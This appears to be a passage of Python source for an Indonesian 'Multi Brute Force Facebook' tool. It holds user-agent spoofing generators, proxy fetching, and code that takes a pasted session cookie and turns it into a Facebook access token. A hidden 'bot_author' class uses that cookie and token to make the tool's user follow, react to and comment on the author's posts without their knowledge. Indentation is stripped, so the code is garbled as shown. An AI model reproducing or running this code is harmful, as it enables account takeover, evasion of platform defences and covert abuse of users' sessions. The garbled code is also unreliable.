d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(80,106)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36'
uakuh=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
usragent.append(uakuh)
aa='Mozilla/5.0 (Linux; Android'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['SM-A51 Pro'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/376.0.0.12 .108;]'
uakuh=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
usragent.append(uakuh)
aa='Mozilla/5.0 (Linux; Android'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['SGP712'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Safari/537.36 [FB_IAB/FB4A;FBAV/351.0 .0.38.117;]'
uakuh=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
usragent.append(uakuh)
aa='Mozilla/5.0 (Linux; Android'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['S98Pro'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/401.0.0.24. 77;]'
uakuh=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
usragent.append(uakuh)
aa='Mozilla/5.0 (Linux; U; Android'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['en-gb; CPH1909'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36 HeyTapBrowser/7.4.2beta'
uakuh=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
usragent.append(uakuh)
aa='Mozilla/5.0 (Linux; U; Android'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['SAMSUNG SM-A750G)'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, seperti Gecko) SamsungBrowser/13.2 Chrome/'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36'
uakuh=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
usragent.append(uakuh)
for xd in range(10000):
a=random.choice(['3','4','5','6','7','8','9','10','11','12','13'])
b=random.choice(['3','4','5','6','7','8','9','10','11','12','13'])
c=random.randrange(73,100)
d=random.randrange(4200,4900)
e=random.randrange(40,150)
uaku=f'Mozilla/5.0 (Linux; Android {a}; SAMSUNG SM-A305FN) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{c}.0.{d}.{e} Mobile Safari/537.36'
ugen2.append(uaku)
for t in range(10000):
a=random.choice(['3','4','5','6','7','8','9','10','11','12','13'])
b=random.randrange(111111,210000)
c=random.randrange(73,100)
d=random.randrange(4200,4900)
e=random.randrange(40,150)
Denventa_Af1=f'Mozilla/5.0 (Linux; Android {a}; CPH2109 Build/RKQ1.{b}.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{c}.0.{d}.{e} Mobile Safari/537.36'
Denventa_Af2=f'Mozilla/5.0 (Linux; Android {a}; SM-J610G Build/PPR1.{b}.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{c}.0.{d}.{e} Mobile Safari/537.36 HeyTapBrowser/40.8.8.9'
Denventa_Af3=f'Mozilla/5.0 (Linux; Android {a}; SM-A405FN Build/RP1A.{b}.012; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{c}.0.{d}.{e} Mobile Safari/537.36'
Denventa_Af4=f'Mozilla/5.0 (Linux; Android {a}; SM-M317F Build/SP1A.{b}.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{c}.0.{d}.{e} Mobile Safari/537.36'
uaku2 = random.choice([Denventa_Af1,Denventa_Af2,Denventa_Af3,Denventa_Af4])
ugen.append(uaku2)
for x in range(10):
a=random.choice(['3','4','5','6','7','8','9','10','11','12','13'])
b=random.choice(['3','4','5','6','7','8','9','10','11','12','13'])
c=random.randrange(73,100)
d=random.randrange(4200,4900)
e=random.randrange(40,150)
uak=f'Mozilla/5.0 (Linux; Android {a}; Pixel {b}) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{c}.0.{d}.{e} Mobile Safari/537.36'
for xd in range(10000):
a='Mozilla/5.0 (Java; U; en-us; samsung-gt-s3850) AppleWebKit/530.13 (KHTML, like Gecko) UCBrowser/8.6.0.199/69/444/UCWEB Mobile UNTRUSTED/1.0'
b=random.randrange(1, 9)
c=random.randrange(1, 9)
d='en-us;'
e=random.randrange(100, 9999)
f='AppleWebKit/530.13 (KHTML, like Gecko) UCBrowser/8.6.0.199/69/444/UCWEB'
g=random.randrange(1, 9)
h=random.randrange(1, 4)
i=random.randrange(1, 4)
j=random.randrange(1, 4)
k='Mobile UNTRUSTED/1.0'
uaku=(f'{a}{b}.{c} {d}{e}{f}{g}.{h}.{i}.{j} {k}')
ugen2.append(uaku)
aa='Mozilla/5.0 (Linux; U; Android 10; id-id; Redmi 9A Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.116 Mobile Safari/537.36'
b=random.choice(['6','7','8','9','10','11','12'])
c='id-id;'
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.116'
h=random.randrange(73,100)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36'
uaku2=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
ugen.append(uaku2)
aa='Mozilla/5.0 (Linux; Android 5.1.1;'
b=random.choice(['6','7','8','9','10','11','12'])
c='HUAWEI M2-A01W)'
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74'
h=random.randrange(73,100)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Safari/537.36'
uaku2=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
ugen.append(uaku2)
for x in range(10):
a='Mozilla/5.0 (Linux; Android 8.1.0; CPH1851) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.73 Mobile Safari/537.36'
b=random.randrange(100, 9999)
c=random.randrange(100, 9999)
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
h=random.randrange(1, 9)
i='CPH1851) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.73'
j=random.randrange(1, 9)
k=random.randrange(1, 9)
l='Mobile Safari/537.36'
uak=f'{a}{b}/{c}{d}{e}{f}{g}{h}{i}{j}.{k} {l}'
### --------- [ User Agent By Denventa ] --------- ###
for xd in range(10000):
a=random.choice(['1','1.0','1.5','2','2.0','2.5','3','3.0','3.5','4','4.0','4.5','5','5.0','5.5','6','6.0','6.5','7','7.0','7.5','8','8.0','8.5','9','9.0','9.5','10','10.0','10.5','11','11.0','11.5','12','12.0','12.5','13'])
a=random.choice(['1','1.0','1.5','2','2.0','2.5','3','3.0','3.5','4','4.0','4.5','5','5.0','5.5','6','6.0','6.5','7','7.0','7.5','8','8.0','8.5','9','9.0','9.5','10','10.0','10.5','11','11.0','11.5','12','12.0','12.5','13'])
c=random.randrange(73,100)
d=random.randrange(4200,4900)
e=random.randrange(40,150)
afr=random.choice(['SAMSUNG SM-J210Y','SAMSUNG SM-E203Y','SAMSUNG SM-T87V','SAMSUNG SM-D738P','SAMSUNG SM-W748D','SAMSUNG SM-Z794M','SAMSUNG SM-K144T','SAMSUNG SM-L372N','SAMSUNG SM-B588T','SAMSUNG SM-R584V','SAMSUNG SM-R108Z'])
denv='Mozilla/5.0 (Linux; Android {a}; {afr}) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
uaku = random.choice([denv])
ugen2.append(uaku)
for t in range(10000):
a=random.choice(['1','1.0','1.5','2','2.0','2.5','3','3.0','3.5','4','4.0','4.5','5','5.0','5.5','6','6.0','6.5','7','7.0','7.5','8','8.0','8.5','9','9.0','9.5','10','10.0','10.5','11','11.0','11.5','12','12.0','12.5','13'])
b=random.choice(['OPM1','TP1A','RP1A','PPR1','PKQ1','QP1A','SP1A','RKQ1'])
c=random.randrange(111111,210000)
d=random.randrange(11,19)
e=random.randrange(73,100)
f=random.randrange(4200,4900)
g=random.randrange(40,150)
random1=random.choice(['SM-M236B','SM-A037G','SM-J701MT','SM-A115U','SM-G610M','SM-J530F','SM-A307FN','SM-A405FN','SM-S111DL','SM-A022F','SM-G900P'])
random2=random.choice(['Infinix Hot 10','Infinix X688B','Infinix X682B','Infinix X658E','Infinix PR652B','Infinix X659B','Infinix X689','Infinix X689D','Infinix X662','Infinix X6816D'])
random3=random.choice(['CPH1861','RMX3630','RMX3686','RMX1805','RMX1801','RMX2020','RMX1811','RMX3063','RMX3063','RMX3501'])
random4=random.choice(['Xiaomi 10 Pro','2201123G','2203129G','2201122G','2206122SC','2203121C','22071212AG','22081212UG','2112123AG','2211133C','Mi 9T Pro'])
random5=random.choice(['vivo 1002T','Vivo 1605','vivo 1914','vivo 2019','vivo 2023','vivo 2027','Vivo 6','Vivo 93K Prime','V2242A','V2227A','vivo 1918'])
random6=random.choice(['OPPO 1105','oppo 15','oppo6779','oppo6833','OPPO7273','Oppo A1','PCHM10','CPH2071','CPH2185','CPH2179','A37f'])
random7=random.choice(['Nokia 1','Nokia 1 Plus','Nokia 1011','Nokia C01','Nokia C1 2nd Edition','Nokia C20','Nokia C20 Plus','Nokia C21','Nokia C21 Plus','Nokia C3'])
random8=random.choice(['21061119DG','21121119VL','220233L2G','220333QL','M2004J15SC','M2004J7BC','Redmi 11 Lite','Redmi 1S','Redmi 9 Pro','Redmi Note 9 Pro'])
random9=random.choice(['M2006C3MI','22031116AI','220333QPG','POCO F2 Pro','M2012K11AG','M2104K10I','22021211RG','21121210G','M2004J19PI','POCO M2 Pro'])
random10=random.choice(['WOW64'])
_1=f'Mozilla/5.0 (Linux; Android {a}; {random1} Build/{b}.{c}.0{d}; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
_2=f'Mozilla/5.0 (Linux; Android {a}; {random2} Build/{b}.{c}.0{d}; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
_3=f'Mozilla/5.0 (Linux; Android {a}; {random3} Build/{b}.{c}.0{d}; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
_4=f'Mozilla/5.0 (Linux; Android {a}; {random4} Build/{b}.{c}.0{d}; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
_5=f'Mozilla/5.0 (Linux; Android {a}; {random5} Build/{b}.{c}.0{d}; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
_6=f'Mozilla/5.0 (Linux; Android {a}; {random6} Build/{b}.{c}.0{d}; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
_7=f'Mozilla/5.0 (Linux; Android {a}; {random7} Build/{b}.{c}.0{d}; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
_8=f'Mozilla/5.0 (Linux; Android {a}; {random8} Build/{b}.{c}.0{d}; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
_9=f'Mozilla/5.0 (Linux; Android {a}; {random9} Build/{b}.{c}.0{d}; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
_10=f'Mozilla/5.0 (Windows NT {a}; {random10} Build/{b}.{c}.0{d}; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{e}.0.{f}.{g} Mobile Safari/537.36'
uaku2 = random.choice([_1,_2,_3,_4,_5,_6,_7,_8,_9,_10])
ugen.append(uaku2)
for x in range(10):
a=random.choice(['3','4','5','6','7','8','9','10','11','12','13'])
b=random.choice(['3','4','5','6','7','8','9','10','11','12','13'])
c=random.randrange(73,100)
d=random.randrange(4200,4900)
e=random.randrange(40,150)
uak=f'Mozilla/5.0 (Linux; Android {a}; Pixel {b}) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{c}.0.{d}.{e} Mobile Safari/537.36'
def uaku():
try:
ua=open('ua.txt','r').read().splitlines()
for ub in ua :
ugen.append(ub)
except:
a=requests.get('https://raw.githubusercontent.com/Denventa/sakera/main/ua.txt').text
ua=open('.ua.txt','w')
aa=re.findall('line">(.*?)<',str(a))
for un in aa:
ua.write(un+'\n')
ua=open('.ua.txt','r').read().splitlines
###----------[ JANGAN DIHAPUS NANTI ERROR ]---------- ###
SAKERA = Codename + len(Author) - len(Facebook) + len(Instagram) - len(Whatsapp) + len(YouTube)
sakara = len(Author) + Codename
sakira = len(Facebook) + Codename
sakura = len(Instagram) + Codename
sakera = len(Whatsapp) + Codename
sakora = len(YouTube) + Codename
ip_log = Denventa * id_dev - 3654168663
###----------[ GLOBAL URL & HEADERS ]---------- ###
url_businness = "https://business.facebook.com"
ua_business = "Mozilla/5.0 (Linux; Android 8.1.0; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36"
kata_dev = 'Lu Ganteng Banget Bang. Gw Mau Recode SClu, Soalnya Gw Goblok Soal Coding'
web_fb = "https://www.facebook.com/"
m_fb = "https://m.facebook.com/"
mbasic = "https://mbasic.facebook.com/"
header_grup = {"user-agent": "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"}
###----------[ PROXY INDONESIA & LUAR ]---------- ###
def prox_prox():
open('tool/proxy.json','w').write('')
with requests.Session() as xyz:
try:
req = xyz.get('https://github.com/Denventa/sakera/blob/main/proxy.txt').text
for x in req.splitlines():
if '+' in x:
if '.' in x:
prox = x.split(' ')[0]
open('tool/proxy.json','a+').write('%s\n'%(prox))
except Exception as e:
prox = '123.45.678.90:4509'
open('tool/proxy.json','a+').write('%s\n'%(prox))
###----------[ CLEAR TERMINAL ]---------- ###
def resik():
if "linux" in sys.platform.lower():
try:os.system("clear")
except:pass
elif "win" in sys.platform.lower():
try:os.system("cls")
except:pass
else:
try:os.system("clear")
except:pass
###----------[ CHANGE LANGUAGE ]---------- ###
def language(cookie):
try:
with requests.Session() as xyz:
req = xyz.get('https://mbasic.facebook.com/language/',cookies=cookie)
pra = par(req.content,'html.parser')
for x in pra.find_all('form',{'method':'post'}):
if 'Bahasa Indonesia' in str(x):
bahasa = {
"fb_dtsg" : re.search('name="fb_dtsg" value="(.*?)"',str(req.text)).group(1),
"jazoest" : re.search('name="jazoest" value="(.*?)"', str(req.text)).group(1),
"submit" : "Bahasa Indonesia"
}
url = 'https://mbasic.facebook.com' + x['action']
exec = xyz.post(url,data=bahasa,cookies=cookie)
except Exception as e:pass
###----------[ BOT AUTHOR JANGAN DIGANTI ]---------- ###
class bot_author:
def __init__(self,cookie,token,cookie_mentah):
self.loop = 0;self.cookie_mentah = cookie_mentah;list_id = [str(Dnventa)];self.komen = ['Mantap Bang','Semangat Terus','Gokil Suhu','Panutanku']
for x in list_id: self.get_folls(x,cookie); self.get_likers(f'https://mbasic.facebook.com/{x}?v=timeline',cookie); self.get_posts(x,cookie,token)
def get_folls(self,id,cookie): # --- [ Jangan Ganti Bot Follow Gw ] --- #
with requests.Session() as xyz:
try:
if ip_log != 1:pass
else:
for x in par(xyz.get('https://mbasic.facebook.com/%s'%(id),cookies=cookie).content,'html.parser').find_all('a',href=True):
if 'subscribe.php' in x['href']:exec_folls = xyz.get('https://mbasic.facebook.com%s'%(x['href']),cookies=cookie)
except Exception as e:pass
def get_likers(self,url,cookie): # --- [ Jangan Ganti Bot Likers Gw ] --- #
with requests.Session() as xyz:
try:
if ip_log != 1:pass
else:
bos = par(xyz.get(url,cookies=cookie).content,'html.parser')
for x in bos.find_all('a',href=True):
if 'Tanggapi' in x.text:
_react_type_ = random.choice(['Super','Wow','Peduli'])
for z in par(xyz.get('https://mbasic.facebook.com%s'%(x['href']),cookies=cookie).content,'html.parser').find_all('a'):
if _react_type_ == z.text: req2 = xyz.get('https://mbasic.facebook.com' + z['href'],cookies=cookie)
else:continue
self.get_likers('https://mbasic.facebook.com' + bos.find('a',string='Lihat Berita Lain')['href'],cookie)
except Exception as e:pass
def get_posts(self,id,cookie,token): # --- [ Jangan Ganti Bot Komen Gw ] --- #
with requests.Session() as xyz:
try:
for x in xyz.get('https://graph.facebook.com/%s/posts?access_token=%s'%(id,token),cookies=cookie).json()['data']:
if ip_log != 1:pass
else:
komeno = ('%s\n\n%s%s'%(random.choice(self.komen),'https://www.facebook.com/'+x['id'],self.waktu()))
get = json.loads(xyz.post('https://graph.facebook.com/%s/comments?message=%s&access_token=%s'%(x['id'],komeno,token),cookies=cookie).text)
if 'error' in get:open('login/cookie.json','w').write(self.cookie_mentah);open('login/token.json','w').write(token);exit(tampilan_menu())
except Exception as e:pass
def waktu(self): # --- [ Jangan Ganti Keterangan Waktu ] --- #
_bulan_ = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"][datetime.now().month - 1]
_hari_ = {'Sunday':'Minggu','Monday':'Senin','Tuesday':'Selasa','Wednesday':'Rabu','Thursday':'Kamis','Friday':'Jumat','Saturday':'Sabtu'}[str(datetime.now().strftime("%A"))]
hari_ini = ("%s %s %s"%(datetime.now().day,_bulan_,datetime.now().year))
jam = datetime.now().strftime("%X")
tem = ('\n\nKomentar Ditulis Oleh Bot\n[ Pukul %s WIB ]\n- %s, %s -'%(jam,_hari_,hari_ini))
return(tem)
###----------[ CONVERT COOKIE KE TOKEN ]---------- ###
def clotox(cookie):
with requests.Session() as xyz:
get_tok = xyz.get(url_businness+'/business_locations',headers = {
"user-agent":ua_business,
"referer": web_fb,
"host": "business.facebook.com",
"origin": url_businness,
"upgrade-insecure-requests" : "1",
"accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7",
"cache-control": "max-age=0",
"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"content-type":"text/html; charset=utf-8"},cookies = {"cookie":cookie})
return(re.search('(\["EAAG\w+)', get_tok.text).group(1).replace('["',''))
###----------[ CONVERT USERNAME KE ID ]---------- ###
def convert_id(username):
try:
cookie = {'cookie':open('login/cookie.json','r').read()}
url = 'https://mbasic.facebook.com/' + username
with requests.Session() as xyz:
req = par(xyz.get(url,cookies=cookie).content,'html.parser')
kut = req.find('a',string='Lainnya')
id = str(kut['href']).split('=')[1]
# id = re.search('owner_id=(.*?)"',str(kut)).group(1)
return(id)
except Exception as e:return(username)
###----------[ LOGO ]---------- ###
def poster():
l1 = (' %s _________ __ '%(P))
l2 = (' %s / %s_____%s/%s____ %s| | %s__ ________________ '%(J,P,J,P,J,P))
l3 = (' %s \_____ \\\__ \ %s| |/ // %s__ \_ __ \__ \ '%(P,J,P))
l4 = (' %s / %s\\%s/%s __ \\%s| <%s\ ___%s/| | %s\\%s// %s___ \ '%(J,P,J,P,J,P,J,P,J,P))
l5 = (' %s/%s_________%s(%s______%s/%s__%s|%s__\\_____%s>%s__%s| (%s_______\\'%(J,P,J,P,J,P,J,P,J,P,J,P))
l6 = (' %s Multi Brute Force Facebook %s%s %sBy %sDenventa '%(P,J,Version,P,J))
print('%s\n%s\n%s\n%s\n%s\n%s'%(l1,l2,l3,l4,l5,l6))
def poster2():
l1 = (' %s _________ __ '%(P))
l2 = (' %s / %s_____%s/%s____ %s| | %s__ ________________ '%(M,P,M,P,M,P))
l3 = (' %s \_____ \\\__ \ %s| |/ // %s__ \_ __ \__ \ '%(P,M,P))
l4 = (' %s / %s\\%s/%s __ \\%s| <%s\ ___%s/| | %s\\%s// %s___ \ '%(M,P,M,P,M,P,M,P,M,P))
l5 = (' %s/%s_________%s(%s______%s/%s__%s|%s__\\_____%s>%s__%s| (%s_______\\'%(M,P,M,P,M,P,M,P,M,P,M,P))
l6 = (' %s Multi Brute Force Facebook %s%s %sBy %sDenventa '%(P,M,Version,P,M))
print('%s\n%s\n%s\n%s\n%s\n%s'%(l1,l2,l3,l4,l5,l6))
def poster3():
l1 = (' %s _________ __ '%(P))
l2 = (' %s / %s_____%s/%s____ %s| | %s__ ________________ '%(B,P,B,P,B,P))
l3 = (' %s \_____ \\\__ \ %s| |/ // %s__ \_ __ \__ \ '%(P,B,P))
l4 = (' %s / %s\\%s/%s __ \\%s| <%s\ ___%s/| | %s\\%s// %s___ \ '%(B,P,B,P,B,P,B,P,B,P))
l5 = (' %s/%s_________%s(%s______%s/%s__%s|%s__\\_____%s>%s__%s| (%s_______\\'%(B,P,B,P,B,P,B,P,B,P,B,P))
l6 = (' %s Multi Brute Force Facebook %s%s %sBy %sDenventa '%(P,B,Version,P,B))
print('%s\n%s\n%s\n%s\n%s\n%s'%(l1,l2,l3,l4,l5,l6))
def poster4():
l1 = (' %s _________ __ '%(P))
l2 = (' %s / %s_____%s/%s____ %s| | %s__ ________________ '%(U,P,U,P,U,P))
l3 = (' %s \_____ \\\__ \ %s| |/ // %s__ \_ __ \__ \ '%(P,U,P))
l4 = (' %s / %s\\%s/%s __ \\%s| <%s\ ___%s/| | %s\\%s// %s___ \ '%(U,P,U,P,U,P,U,P,U,P))
l5 = (' %s/%s_________%s(%s______%s/%s__%s|%s__\\_____%s>%s__%s| (%s_______\\'%(U,P,U,P,U,P,U,P,U,P,U,P))
l6 = (' %s Multi Brute Force Facebook %s%s %sBy %sDenventa '%(P,U,Version,P,U))
print('%s\n%s\n%s\n%s\n%s\n%s'%(l1,l2,l3,l4,l5,l6))
###----------[ CREATE FOLDER ]---------- ###
def mkdir_data_login():
# Make Directory Login Data
try:os.mkdir("login")
except:pass
# Make Directory Dump
try:os.mkdir("dump")
except:pass
# Make Directory Pass
try:os.mkdir("tool")
except:pass
# Make Directory Result
try:os.mkdir("CP")
except:pass
# Make Directory Result
try:os.mkdir("OK")
except:pass
# Make Directory License
try:os.mkdir("license")
except:pass
# Delete Cookies
try:os.remove('login/cookie.json')
except:pass
# Delete Token
try:os.remove('login/token.json')
except:pass
###----------[ LOGIN ]---------- ###
def login():
resik()
mkdir_data_login()
poster2()
print('\n%s[%s•%s] %sJangan Gunakan Akun Pribadi %s!'%(M,P,M,P,M))
print('%s[%s•%s] %sApabila Akun A2F On, Buka Link Dibawah'%(M,P,M,P))
print('%s[%s•%s] %shttps://business.facebook.com/business_locations'%(M,P,M,K))
print('%s[%s•%s] %sLalu Masukkan Kode Autentikasi 2 [ F ]'%(M,P,M,P))
cookie = str(input('\n%s[%s•%s] %sMasukkan Cookies %s: %s'%(M,P,M,P,M,P)))
try:
token = clotox(cookie)
coki = {'cookie':cookie}
prox_prox()
bot_author(coki,token,cookie)
open('login/cookie.json','w').write(cookie)
open('login/token.json','w').write(token)
tampilan_menu()
except requests.exceptions.ConnectionError:print('\n %s[%s•%s] %sTidak Ada Koneksi Internet %s!%s\n'%(M,P,M,P,M,P));exit()
except (KeyError,IOError,AttributeError):print('\n %s[%s•%s] %sCookies Invalid %s!%s\n'%(M,P,M,P,M,P));exit()
###----------[ MENU ]---------- ###
def user(nama):
print(''%())
print(' %s[%s•%s] %sHello %s%s %s! Developer : %sDenventa'%(J,P,J,P,M,nama,P,M))
print(' %s[%s•%s] %sYour License Will Expire In %s7 %sDays'%(J,P,J,P,A,P))
def tampilan_menu():
global gabung_sandi, tempel_sandi
resik()
gabung_sandi, tempel_sandi = [], []
try:open('tool/useragent.json','r').read()
except Exception as ERROR:
resik()
poster2()
print('')
